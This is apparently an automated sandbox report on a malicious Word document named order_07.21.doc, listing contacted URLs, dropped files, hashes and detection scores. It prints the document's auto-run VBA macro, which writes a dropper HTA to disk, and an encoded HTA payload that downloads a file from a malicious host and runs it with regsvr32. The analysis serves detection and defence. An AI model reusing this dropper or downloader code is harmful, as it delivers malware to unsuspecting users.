http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://airloweryd.com/adda/CzJsZLz8s7e1PAiOuESLghxyuWpr1A46cHBNR/dmIczx3VCKJVxOIM45tzrpZTl8IQ06/ryme0%Avira URL Cloudsafe
http://servername/isapibackend.dll0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
airloweryd.com
unknown
unknowntrueunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkmshta.exe, 00000004.00000002.2093825142.00000000038B7000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2151734903.00000000049B7000.00000002.00000001.sdmpfalse
    high
    http://www.windows.com/pctv.mshta.exe, 00000004.00000002.2093556199.00000000036D0000.00000002.00000001.sdmpfalse
      high
      http://investor.msn.commshta.exe, 00000004.00000002.2093556199.00000000036D0000.00000002.00000001.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtmshta.exe, 00000004.00000002.2093556199.00000000036D0000.00000002.00000001.sdmpfalse
          high
          http://www.%s.comPAregsvr32.exe, 00000006.00000002.2148005184.0000000002230000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          low
          http://www.icra.org/vocabulary/.mshta.exe, 00000004.00000002.2093825142.00000000038B7000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2151734903.00000000049B7000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000006.00000002.2148005184.0000000002230000.00000002.00000001.sdmpfalse
            high
            http://windowsmedia.com/redir/services.asp?WMPFriendly=truemshta.exe, 00000004.00000002.2093825142.00000000038B7000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2151734903.00000000049B7000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.hotmail.com/oemshta.exe, 00000004.00000002.2093556199.00000000036D0000.00000002.00000001.sdmpfalse
              high
              http://airloweryd.com/adda/CzJsZLz8s7e1PAiOuESLghxyuWpr1A46cHBNR/dmIczx3VCKJVxOIM45tzrpZTl8IQ06/rymemshta.exe, 00000004.00000003.2089902053.0000000006141000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.2089458384.00000000011ED000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://servername/isapibackend.dllregsvr32.exe, 00000006.00000002.2147708765.0000000001F30000.00000002.00000001.sdmpfalse
              • Avira URL Cloud: safe
              low
              http://investor.msn.com/mshta.exe, 00000004.00000002.2093556199.00000000036D0000.00000002.00000001.sdmpfalse
                high

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious

                Private

                IP
                192.168.2.255

                General Information

                Joe Sandbox Version:33.0.0 White Diamond
                Analysis ID:452438
                Start date:22.07.2021
                Start time:11:00:15
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 5m 42s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:order_07.21.doc
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:7
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal96.expl.evad.winDOC@8/11@3/1
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 8
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .doc
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                • Execution Graph export aborted for target mshta.exe, PID 2232 because there are no executed function
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                11:00:34API Interceptor107x Sleep call for process: cmd.exe modified
                11:00:35API Interceptor86x Sleep call for process: mshta.exe modified
                11:00:42API Interceptor237x Sleep call for process: regsvr32.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASN

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\ProgramData\captionEx.hta
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:HTML document, ASCII text, with very long lines, with CRLF, CR line terminators
                Category:dropped
                Size (bytes):3039
                Entropy (8bit):5.8499136819223425
                Encrypted:false
                SSDEEP:48:yAmqAXYLXHqiJXzatwLgXa/1CTaToY/353YaMr8SSjAG75XltCuxa5tD8tlsHsuH:l6YTlhza+gXataeoY/J3YaMrAl7da5t9
                MD5:111964AF02201E77AD219F7562BF19B2
                SHA1:9A48E4281A89383FF5AF45EE2F2BF710704E5152
                SHA-256:FB2A3EB78EF18021BD6DA3398FB8D935FD3884F418DDA72FC123903501B5B503
                SHA-512:141C2DAC7594678BC7DA7DE7E9DFC4E90A6A6B4E5EE5985B03F37E97827B59E0BBB6509D88AB6A3CF129DE2EB1660B90FB953F2ABCE441F5D37154D2F3C34784
                Malicious:false
                Reputation:low
                Preview: <html>.<body>.<div id='integerSwap'>fX17KWUoaGN0YWN9O2Vzb2xjLnlyZXVRdHNldXFlcjspMiAsImdwai54RW5vaXRwYWNcXGNpbGJ1cFxcc3Jlc3VcXDpjIihlbGlmb3RldmFzLnlyZXVRdHNldXFlcjspeWRvYmVzbm9wc2VyLmV0ZWxlRHljbmVycnVDeXBvYyhldGlydy55cmV1UXRzZXVxZXI7MSA9IGVweXQueXJldVF0c2V1cWVyO25lcG8ueXJldVF0c2V1cWVyOykibWFlcnRzLmJkb2RhIih0Y2VqYk9YZXZpdGNBIHdlbiA9IHlyZXVRdHNldXFlciByYXZ7eXJ0eykwMDIgPT0gc3V0YXRzLmV0ZWxlRHljbmVycnVDeXBvYyhmaTspKGRuZXMuZXRlbGVEeWNuZXJydUN5cG9jOyllc2xhZiAsInJhS3BVS3Z5PWVtaXQmek5TS2d4WTNVUFpjaUI9ZmVyJmdrN1NJZkg4bGJLZjVHVXZrTGxHWlo9ZGkmbDhyRnBqM1phb0ptYjJKYT1lZ2FwJmtCNGtmeGlaUFJJNnRBcj1kaSZiajVTM3RuMEpjbUY9ZGlzJm9DPXhjRT8xc2VteXIvNjBRSThsVFpwcnp0NTRNSU94VkpLQ1YzeHpjSW1kL1JOQkhjNjRBMXJwV3V5eGhnTFNFdU9pQVAxZTdzOHpMWnNKekMvYWRkYS9tb2MuZHlyZXdvbHJpYS8vOnB0dGgiICwiVEVHIihuZXBvLmV0ZWxlRHljbmVycnVDeXBvYzspInB0dGhsbXguMmxteHNtIih0Y2VqYk9YZXZpdGNBIHdlbiA9IGV0ZWxlRHljbmVycnVDeXBvYyByYXY=aGkhOykiZ3BqLnhFbm9pdHBhY1xcY2lsYnVwXFxzcmVzdVxcOmMgMjNydnNnZXIiKG51ci5ITGxhdjspInRjZWpib21ldHN5c2VsaWYuZ25pdHBpcmNz
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\error[1]
                Process:C:\Windows\SysWOW64\mshta.exe
                File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                Category:downloaded
                Size (bytes):3247
                Entropy (8bit):5.459946526910292
                Encrypted:false
                SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa
                MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
                SHA1:BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
                SHA-256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
                SHA-512:245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
                Malicious:false
                Reputation:moderate, very likely benign file
                IE Cache URL:res://ieframe.dll/error.dlg
                Preview: ...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\warning[1]
                Process:C:\Windows\SysWOW64\mshta.exe
                File Type:GIF image data, version 89a, 36 x 38
                Category:downloaded
                Size (bytes):1062
                Entropy (8bit):4.517838839626174
                Encrypted:false
                SSDEEP:12:z4ENetWsdvCMtkEFk+t2cd3ikIbOViGZVsMLfE4DMWUcC/GFvyVEZd6vcmadxVtS:nA/ag/QSi6/LKZzqKVQgJOexQkYfG6E
                MD5:124A9E7B6976F7570134B7034EE28D2B
                SHA1:E889BFC2A2E57491016B05DB966FC6297A174F55
                SHA-256:5F95EFF2BCAAEA82D0AE34A007DE3595C0D830AC4810EA4854E6526E261108E9
                SHA-512:EA1B3CC56BD41FC534AAC00F186180345CB2C06705B57C88C8A6953E6CE8B9A2E3809DDB01DAAC66FA9C424D517D2D14FA45FBEF9D74FEF8A809B71550C7C145
                Malicious:false
                Reputation:moderate, very likely benign file
                IE Cache URL:res://ieframe.dll/warning.gif
                Preview: GIF89a$.&.......h...............h.hh..h..h..h..h....h................h.................h.................h................hh.h..h..h..h..h.hhhhh.hh.hh.hh.hh..hh.h..h..h.h..h..hh.h..h..h..h..h..hh.h..h..h..h..h..hh.h..h..h..h..h...h...............h.hh..h..h..h..h....h...............h................h...........h.................h...............h.hh..h..h..h..h....h................h.................h.................h.................h..............h.hh.h..h..h..h....h..............h................h................h................h...............h.hh..h..h..h..h....h................h.................h.................h......................................................................................................................................!.......,....$.&.@......H.......<0.....VXQH..C..1>.(..@..C.t.q"B..S.\.r.D...Z.. .M.41.".......<.r.;.r4..P..]....+.T-...N...x....1.:..TdD...^.j..W.r...y....V...Lx0..):8p q.4.;...f`.r-K...(..P....t.].~..l..
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\error[1]
                Process:C:\Windows\SysWOW64\mshta.exe
                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                Category:downloaded
                Size (bytes):1706
                Entropy (8bit):5.274543201400288
                Encrypted:false
                SSDEEP:48:NIAbzyYh8rRLkRVNaktqavP61GJZoF+SMy:xWqxztqaHO
                MD5:B9BEC45642FF7A2588DC6CB4131EA833
                SHA1:4D150A53276C9B72457AE35320187A3C45F2F021
                SHA-256:B0ABE318200DCDE42E2125DF1F0239AE1EFA648C742DBF9A5B0D3397B903C21D
                SHA-512:C119F5625F1FC2BCDB20EE87E51FC73B31F130094947AC728636451C46DCED7B30954A059B24FEF99E1DB434581FD9E830ABCEB30D013404AAC4A7BB1186AD3A
                Malicious:false
                Reputation:moderate, very likely benign file
                IE Cache URL:res://ieframe.dll/error.js
                Preview: ...window.onerror = HandleError..function HandleError(message, url, line)..{..var str = L_Dialog_ErrorMessage + "\n\n"..+ L_ErrorNumber_Text + line + "\n"..+ message;..alert (str);..window.close();..return true;..}..function loadBdy()..{..var objOptions = window.dialogArguments;..btnNo.onclick = new Function("btnOKClick()");..btnNo.onkeydown = new Function("SwitchFocus()");..btnYes.onclick = new Function("btnYesClick()");..btnYes.onkeydown = new Function("SwitchFocus()");..document.onkeypress = new Function("docKeypress()");..spnLine.innerText = objOptions.getAttribute("errorLine");..spnCharacter.innerText = objOptions.getAttribute("errorCharacter");..spnError.innerText = objOptions.getAttribute("errorMessage");..spnCode.innerText = objOptions.getAttribute("errorCode");..txaURL.innerText = objOptions.getAttribute("errorUrl");..if (objOptions.errorDebug)..{..divDebug.innerText = L_ContinueScript_Message;..}..btnYes.focus();..}..function SwitchFocus()..{..var HTML_KEY_ARROWLEFT = 37;..
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6002BB0F.png
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:PNG image data, 1022 x 235, 8-bit/color RGB, non-interlaced
                Category:dropped
                Size (bytes):25449
                Entropy (8bit):7.717073073385733
                Encrypted:false
                SSDEEP:768:5Q0NLh5g3xayQTvC4JwSJHfVEhWlB6zLn:5Qig3xayQ7JwoHfVEhWlB6H
                MD5:8F21C647D253A3CE991C371D19437151
                SHA1:6FCD455E7A040B387AA6F5A6737FFE06C5B9E39A
                SHA-256:7E7864C1563D7D1EDFE3FBDD2F9524F30EFC716716E84F25A1691DF7F628206F
                SHA-512:260AD36890A8947D351AA2FE73B76CCD7361950D3F564191E04FD540C62A89C55E65FB8C31024C18D21BD7B018CE44FB12CFD0B0268CF41DA56588B70FA1F7C4
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: .PNG........IHDR............._../...&iCCPAdobe RGB (1998)..(.c``2ptqre.``..+).rwR...R`?..............> v^~^*...v...D_....@..J.(*.....(%.8......../)..3...E..... vQH.3.}...K.....I........ ..H}:....6....KR+@.28..T.e.g.(.ZZZ*8..'.*.W.....+x.%.....%.....B..........j..d.2.....9....bg.b..\ZT.e22...#.#.......B...a.....T...!...>..9...O..:6\....pHYs..........+......iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164648, 2021/01/12-15:52:29 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/"
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{47D4F006-6281-436E-ADD1-2266A057AE87}.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):1024
                Entropy (8bit):0.05390218305374581
                Encrypted:false
                SSDEEP:3:ol3lYdn:4Wn
                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                Malicious:false
                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{76C67B44-1352-433D-B760-8C34027C46CD}.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):9588
                Entropy (8bit):3.36228779012647
                Encrypted:false
                SSDEEP:192:KJtOd6IW2Ju7gkWlqCqvcDFoIIHMSWjWHSHf:Ati6MJu7gkWovQKMS2
                MD5:B18AD56AEC351E4A3116AAE4BCFB1EEA
                SHA1:867CCD578E80F0A9BE76ED84D9102C43D3017B76
                SHA-256:D9FACCCA44F5328AE0D1BD28C0C0223C174D3272D832710DF7D257A753E030AA
                SHA-512:FEBD24CF0E2F8E3510191D27D6D3A449F00E45710C964FFB47160B6C21DA11FFC216FAB5122E8C9FADD9D0733C806D8973263C0ACFC8B50B53311F0547BEE70B
                Malicious:false
                Preview: ....<.h.t.m.l.>...<.b.o.d.y.>...<.d.i.v. .i.d.=.'.i.n.t.e.g.e.r.S.w.a.p.'.>................................................................................................................................................................................................................................................................................................................................................................................................................................................................. .......b...............*.......d...h...................H...L...z...~...l...........4...z...........4...:...................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):71
                Entropy (8bit):4.153101000769482
                Encrypted:false
                SSDEEP:3:M1MtaUd2SmuaUd2mX1MtaUd2v:MyZd2qdWZdI
                MD5:50718DAD15698A25C72EC2E62022DC0E
                SHA1:75B30EC623E66D04149B44D9C1D7931709741E26
                SHA-256:C8FCB6D1F3A340DBD6830E135E41231564BBF702D6BF94C715343744BD412514
                SHA-512:1345294D60234FA9229AE7E3A24D3358A19740EC9D199000E8A8092796473D22A851787AED65F23BDE4F430EA4145F1E38F30B728D9AF5CBBF1BE112640D0562
                Malicious:false
                Preview: [doc]..order_07.21.LNK=0..order_07.21.LNK=0..[doc]..order_07.21.LNK=0..
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\order_07.21.LNK
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Wed Aug 26 14:08:12 2020, atime=Thu Jul 22 17:00:31 2021, length=89257, window=hide
                Category:dropped
                Size (bytes):2038
                Entropy (8bit):4.519446214646222
                Encrypted:false
                SSDEEP:24:83Xk/XTwz6Ikn+NeHXxZDv3q+dM7dD23Xk/XTwz6Ikn+NeHXxZDv3q+dM7dV:8nk/XT3Ik+Nsu+Qh2nk/XT3Ik+Nsu+Q/
                MD5:037ED454C333186B84D3F7A64DC56ABA
                SHA1:17B4E2E34D22F3388540F461DB8D6D07BF61F07D
                SHA-256:ABDEB150FAC2362C15E723E834020A747C1CA0B67816ADC163EA72FF32E367CC
                SHA-512:62648EFD5A9ABB79B8458CE5DDC178B92812B6A991E0BC07E5D1593CBE51AF497334B30E1D156CC02836DA291360D3E2204FA039E44E2E291BBE1067A3BE7D1B
                Malicious:false
                Preview: L..................F.... ...f....{..f....{..5UGv#....\...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2..\...R.. .ORDER_~1.DOC..L.......Q.y.Q.y*...8.....................o.r.d.e.r._.0.7...2.1...d.o.c.......y...............-...8...[............?J......C:\Users\..#...................\\377142\Users.user\Desktop\order_07.21.doc.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.o.r.d.e.r._.0.7...2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......377142..........D_....3N...W...9F.C...........[D_....3N...W...9F
                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162
                Entropy (8bit):2.4311600611816426
                Encrypted:false
                SSDEEP:3:vrJlaCkWtVydH/5llORewrU9lln:vdsCkWtORWRjYl
                MD5:390880DCFAA790037FA37F50A7080387
                SHA1:760940B899B1DC961633242DB5FF170A0522B0A5
                SHA-256:BE4A99C0605649A08637AC499E8C871B5ECA2BAA03909E8ADBAA4C7A6A1D5391
                SHA-512:47E6AC186253342882E375AA38252D8473D1CA5F6682FABD5F459E1B088B935E326E1149080E0FE94AB176A101BA2CB9E8B700AB5AFAE26F865982A8DA295FD3
                Malicious:false
                Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                C:\Users\user\Desktop\~$der_07.21.doc
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162
                Entropy (8bit):2.4311600611816426
                Encrypted:false
                SSDEEP:3:vrJlaCkWtVydH/5llORewrU9lln:vdsCkWtORWRjYl
                MD5:390880DCFAA790037FA37F50A7080387
                SHA1:760940B899B1DC961633242DB5FF170A0522B0A5
                SHA-256:BE4A99C0605649A08637AC499E8C871B5ECA2BAA03909E8ADBAA4C7A6A1D5391
                SHA-512:47E6AC186253342882E375AA38252D8473D1CA5F6682FABD5F459E1B088B935E326E1149080E0FE94AB176A101BA2CB9E8B700AB5AFAE26F865982A8DA295FD3
                Malicious:false
                Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

                Static File Info

                General

                File type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                Entropy (8bit):5.976846319095004
                TrID:
                • Microsoft Office XML Flat File Format Word Document (ASCII) (139530/1) 62.14%
                • Microsoft Office XML Flat File Format (ASCII) (66519/1) 29.62%
                • Visual Basic Script (13500/0) 6.01%
                • Generic XML (ASCII) (5005/1) 2.23%
                File name:order_07.21.doc
                File size:89257
                MD5:401b19c454075d52bd832725f3c22cfe
                SHA1:088f76c184a0cba673abc41bd5582e4e21672fdd
                SHA256:6b94e6319e46f52058d5f0c1bc07d7e367152e3bb769f2fd1af097914fe64ce3
                SHA512:b83ddf0a5dc6174591e0c07a1b87f5ffb5a1efa731913707829195415bed70a5dff43d9669e948e509fd3e77d15986391e1e01b9344c2694dd1b0fba5b87f894
                SSDEEP:1536:EVzJCsRRHr11AQYyqGJHQYCDEtU6dLTR97YVuL6:NKPxQYNtU6ZvYVuu
                File Content Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<?mso-application progid="Word.Document"?>..<w:wordDocument xmlns:aml="http://schemas.microsoft.com/aml/2001/core" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmln

                File Icon

                Icon Hash:e4eea2aaa4b4b4a4

                Static OLE Info

                General

                Document Type:Word2003_XML
                Number of OLE Files:1

                OLE File "/opt/package/joesandbox/database/analysis/452438/sample/order_07.21.doc"

                Indicators

                Has Summary Info:False
                Application Name:unknown
                Encrypted Document:False
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:True

                Streams with VBA

                VBA File Name: ThisDocument.cls, Stream Size: 1309
                General
                Stream Path:VBA/ThisDocument
                VBA File Name:ThisDocument.cls
                Stream Size:1309
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . X . . . . . . . . . . . % . r u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . z . . . N . . M . . . . . . . . . . . j . . . N . S " i . j . h . . . . . . . . . . . . . . . . . . . . ; . . % . . . C . . . . . t . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . ; . . % . . . C . . . . . t . 2 z . . . N . . M . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 06 00 01 00 00 8c 03 00 00 e4 00 00 00 ea 01 00 00 ba 03 00 00 c8 03 00 00 58 04 00 00 01 00 00 00 01 00 00 00 25 82 72 75 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 7a b8 8a b8 4e cb 83 4d ae 0a a9 05 c5 c8 fc 85 fc 04 93 6a d4 ee dc 4e 9f 53 22 69 1f 6a fb 68 00 00 00 00 00 00 00 00 00 00 00 00 00

                VBA Code Keywords

                Keyword
                False
                VB_Exposed
                Attribute
                VB_Creatable
                VB_Name
                document_open()
                VB_PredeclaredId
                VB_GlobalNameSpace
                VB_Base
                VB_Customizable
                VB_TemplateDerived
                "ThisDocument"
                VBA Code
                Attribute VB_Name = "ThisDocument"
                Attribute VB_Base = "1Normal.ThisDocument"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = True
                Attribute VB_Customizable = True
                Sub document_open()
                main
                End Sub
                VBA File Name: boxPasteNext.bas, Stream Size: 1668
                General
                Stream Path:VBA/boxPasteNext
                VBA File Name:boxPasteNext.bas
                Stream Size:1668
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . Y . . . . . . . . . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 00 f0 00 00 00 82 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 89 03 00 00 59 05 00 00 00 00 00 00 01 00 00 00 25 82 8f aa 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                VBA Code Keywords

                Keyword
                VB_Name
                main()
                captionDeleteCur()
                Print
                Public
                "boxPasteNext"
                Function
                windowLst
                Mid(ActiveDocument.Range.Text,
                Output
                arrayObjectButt
                screenIndVal
                screenIndVal()
                Attribute
                "c:\programdata\captionEx.hta"
                Close
                captionDeleteCur
                windowLst()
                VBA Code
                Attribute VB_Name = "boxPasteNext"
                Function screenIndVal()
                screenIndVal = Mid(ActiveDocument.Range.Text, 2, 1500000)
                End Function
                Function windowLst()
                windowLst = "c:\programdata\captionEx.hta"
                End Function
                Function captionDeleteCur()
                Open windowLst For Output As #1
                Print #1, screenIndVal
                Close #1
                End Function
                Public Sub main()
                captionDeleteCur
                arrayObjectButt
                End Sub
                VBA File Name: buttSwap.bas, Stream Size: 945
                General
                Stream Path:VBA/buttSwap
                VBA File Name:buttSwap.bas
                Stream Size:945
                Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . % . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
